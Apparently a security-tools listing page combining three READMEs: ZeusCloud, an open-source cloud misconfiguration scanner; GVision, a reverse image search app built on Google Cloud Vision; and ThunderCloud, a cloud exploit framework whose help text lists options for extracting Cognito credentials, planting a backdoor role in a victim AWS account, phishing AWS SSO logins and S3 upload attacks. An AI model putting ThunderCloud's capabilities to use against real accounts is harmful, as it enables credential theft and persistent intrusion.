  • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
  • Configurability - Configure which security rules are active, which alerts should be muted, and more.
  • Security as Code - Modify rules or write your own with our extensible security as code approach.
  • Remediation - Follow step by step guides to remediate security findings.
  • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!

Why ZeusCloud?

Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.

We had to take action.

  • We noticed traditional cloud security tools are opaque, confusing, time consuming to set up, and expensive as you scale your cloud environment
  • Cybersecurity vendors don't provide much actionable information to security, engineering, and devops teams by inundating them with non-contextual alerts
  • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
  • Best of all, you can use ZeusCloud for free!

Future Roadmap

  • Integrations with vulnerability scanners
  • Integrations with secret scanners
  • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
  • Support for Azure and GCP environments

Contributing

We love contributions of all sizes. What would be most helpful first:

  • Please give us feedback in our Slack.
  • Open a PR (see our instructions below on developing ZeusCloud locally)
  • Submit a feature request or bug report through Github Issues.

Development

Run containers in development mode:

cd frontend && yarn && cd -
docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

Reset neo4j and/or postgres data with the following:

rm -rf .compose/neo4j
rm -rf .compose/postgres

To develop on frontend, make the code changes and save.

To develop on backend, run

docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend

To access the UI, go to: http://localhost:80.

Security

Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

Open-source vs. cloud-hosted

This repo is freely available under the Apache 2.0 license.

We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!



GVision - A Reverse Image Search App That Uses Google Cloud Vision API To Detect Landmarks And Web Entities From Images, Helping You Gather Valuable Information Quickly And Easily


GVision is a reverse image search app that uses the Google Cloud Vision API to detect landmarks and web entities from images, helping you gather valuable information quickly and easily.


About Google Cloud Vision API

Google Cloud Vision API is a machine learning-powered image analysis service that provides developers with tools to understand the contents of an image. It can detect objects, faces, text, logos, and more within an image.

Getting Started

Before using the app, you need to obtain a Google Cloud Vision API key.

  • Go to the Google Cloud Platform Console.
  • Create a new project or select an existing one.
  • Enable the Cloud Vision API for your project.
  • Create a service account and download a private key in JSON format.
  • Upload your Google Cloud Vision API key in JSON format by clicking on the Upload a config file button in the sidebar.

Installation

To install the dependencies, simply run the following command:

pip install -r requirements.txt

Running the app

You can run the app locally by running the following command:

streamlit run gvision.py

Usage

Using GVision is simple and straightforward:

  • Upload your Google Cloud Vision API key in JSON format by clicking on the Upload a config file button in the sidebar.
  • Once the key is uploaded, the app will automatically authenticate with the Google Cloud Vision API.
  • Upload an image in JPG, JPEG, or PNG format by clicking on the Choose an image button.
  • Wait for the app to analyze the image. The app will detect landmarks and web entities present in the image and display them on a map.
  • Choose between the different tile options to view the detected landmarks and web entities.

You can also find links to the Google Cloud Vision API documentation and pricing in the Resources section of the sidebar.

To reset the app to its default state or to clear the uploaded image and results, click on the Reset app button.
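Under the hood, landmark detection with the Vision API looks roughly like the following (a minimal sketch using the google-cloud-vision Python client, independent of GVision's own code; file names are placeholders):

from google.cloud import vision

# Authenticate with the service-account key downloaded earlier (placeholder path).
client = vision.ImageAnnotatorClient.from_service_account_json("key.json")

with open("photo.jpg", "rb") as f:
    image = vision.Image(content=f.read())

response = client.landmark_detection(image=image)
for landmark in response.landmark_annotations:
    coords = landmark.locations[0].lat_lng
    print(landmark.description, coords.latitude, coords.longitude)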




ThunderCloud - Cloud Exploit Framework


Cloud Exploit Framework


Usage

python3 tc.py -h

[ThunderCloud ASCII art banner]


usage: tc.py [-h] [-ce COGNITO_ENDPOINT] [-reg REGION] [-accid AWS_ACCOUNT_ID] [-aws_key AWS_ACCESS_KEY] [-aws_secret AWS_SECRET_KEY] [-bdrole BACKDOOR_ROLE] [-sso SSO_URL] [-enum_roles ENUMERATE_ROLES] [-s3 S3_BUCKET_NAME]
[-conn_string CONNECTION_STRING] [-blob BLOB] [-shared_access_key SHARED_ACCESS_KEY]

Attack modules of cloud AWS

optional arguments:
-h, --help show this help message and exit
-ce COGNITO_ENDPOINT, --cognito_endpoint COGNITO_ENDPOINT
to verify if cognito endpoint is vulnerable and to extract credentials
-reg REGION, --region REGION
AWS region of the resource
-accid AWS_ACCOUNT_ID, --aws_account_id AWS_ACCOUNT_ID
AWS account of the victim
-aws_key AWS_ACCESS_KEY, --aws_access_key AWS_ACCESS_KEY
AWS access keys of the victim account
-aws_secret AWS_SECRET_KEY, --aws_secret_key AWS_SECRET_KEY
AWS secret key of the victim account
-bdrole BACKDOOR_ROLE, --backdoor_role BACKDOOR_ROLE
Name of the backdoor role in victim role
-sso SSO_URL, --sso_url SSO_URL
AWS SSO URL to phish for AWS credentials
-enum_roles ENUMERATE_ROLES, --enumerate_roles ENUMERATE_ROLES
To enumerate and assume account roles in victim AWS roles
-s3 S3_BUCKET_NAME, --s3_bucket_name S3_BUCKET_NAME
Execute upload attack on S3 bucket
-conn_string CONNECTION_STRING, --connection_string CONNECTION_STRING
Azure shared access key for reading servicebus/queues/blobs, etc.
-blob BLOB, --blob BLOB
Azure blob enumeration
-shared_access_key SHARED_ACCESS_KEY, --shared_access_key SHARED_ACCESS_KEY
Azure shared key

Requirements

* python 3
* pip
* git

Installation

- Get the project: git clone https://github.com/Rnalter/ThunderCloud.git && cd ThunderCloud/
- Install virtualenv (https://virtualenv.pypa.io/en/latest/): pip install virtualenv
- Create a Python 3.6 local environment: virtualenv -p python3.6 venv
- Activate the virtual environment: source venv/bin/activate
- Install project dependencies: pip install -r requirements.txt
- Run the tool via: python tc.py --help

Running ThunderCloud

Examples

python3 tc.py -sso <sso_url> --region <region>
python3 tc.py -ce <cognito_endpoint> --region <region>


โŒ